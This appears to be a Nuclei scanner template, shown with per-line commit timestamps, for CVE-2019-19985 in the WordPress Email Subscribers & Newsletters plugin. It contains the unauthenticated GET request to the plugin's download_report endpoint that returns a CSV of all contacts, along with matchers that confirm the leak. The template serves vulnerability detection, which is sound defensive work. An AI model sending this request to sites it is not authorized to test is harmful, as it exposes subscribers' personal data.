2021-01-02 04:59:06 +00:00
id : CVE-2019-19985
2020-08-04 20:19:57 +00:00
info :
2023-01-30 21:41:58 +00:00
name : WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval
2021-06-09 12:20:56 +00:00
author : KBA@SOGETI_ESEC,madrobot,dwisiswant0
2020-08-04 20:19:57 +00:00
severity : medium
2023-01-30 21:41:58 +00:00
description : WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-09-06 12:53:28 +00:00
remediation : |
Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/48698
2022-05-17 09:18:12 +00:00
- https://wpvulndb.com/vulnerabilities/9946
- https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/
- http://packetstormsecurity.com/files/158563/WordPress-Email-Subscribers-And-Newsletters-4.2.2-File-Disclosure.html
2023-01-30 21:41:58 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-19985
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-19985
cwe-id : CWE-862
2023-08-31 11:46:18 +00:00
epss-score : 0.08255
epss-percentile : 0.93525
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : icegram
product : email_subscribers_\&_newsletters
2023-09-06 12:53:28 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve2019,wordpress,wp-plugin,edb,packetstorm,cve
2020-08-04 20:19:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-08-04 20:19:57 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-08-04 20:19:57 +00:00
words :
2020-08-12 17:39:50 +00:00
- Name
- Email
- Status
- Created On
2020-08-15 08:04:58 +00:00
condition : and
2020-08-12 17:44:53 +00:00
2020-08-15 08:04:58 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-08-15 08:04:58 +00:00
words :
- "Content-Disposition: attachment; filename=all-contacts.csv;"
2020-08-04 20:19:57 +00:00
- type : status
status :
2022-05-13 20:26:43 +00:00
- 200